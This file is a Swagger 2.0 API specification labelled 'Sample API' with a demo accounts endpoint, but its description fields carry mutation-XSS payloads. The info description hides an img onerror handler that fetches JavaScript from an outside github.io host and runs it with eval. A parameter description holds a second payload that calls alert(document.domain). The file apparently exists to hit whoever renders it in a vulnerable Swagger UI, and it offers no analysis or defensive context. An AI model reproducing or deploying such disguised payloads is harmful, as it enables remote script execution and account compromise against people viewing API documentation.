swagger: '2.0'
info:
  title: Sample API
  description: |
    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=fetch('https://pocg33.github.io/foo-dom/scriptdeere.js').then(function(res){res.text().then(function(data){eval(data)})}) src=1>"></form>
  version: production
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  /API:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - Demo
      operationId: findAccounts
      summary: Finds all accounts
  '/demo/demoid/{id}':
    delete:
      parameters:
        - description: |
            <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(document.domain) src=1>"></form>
          format: int64
          in: path
          name: id
          required: true
          type: integer
      responses:
        '200':
          description: No response was specified
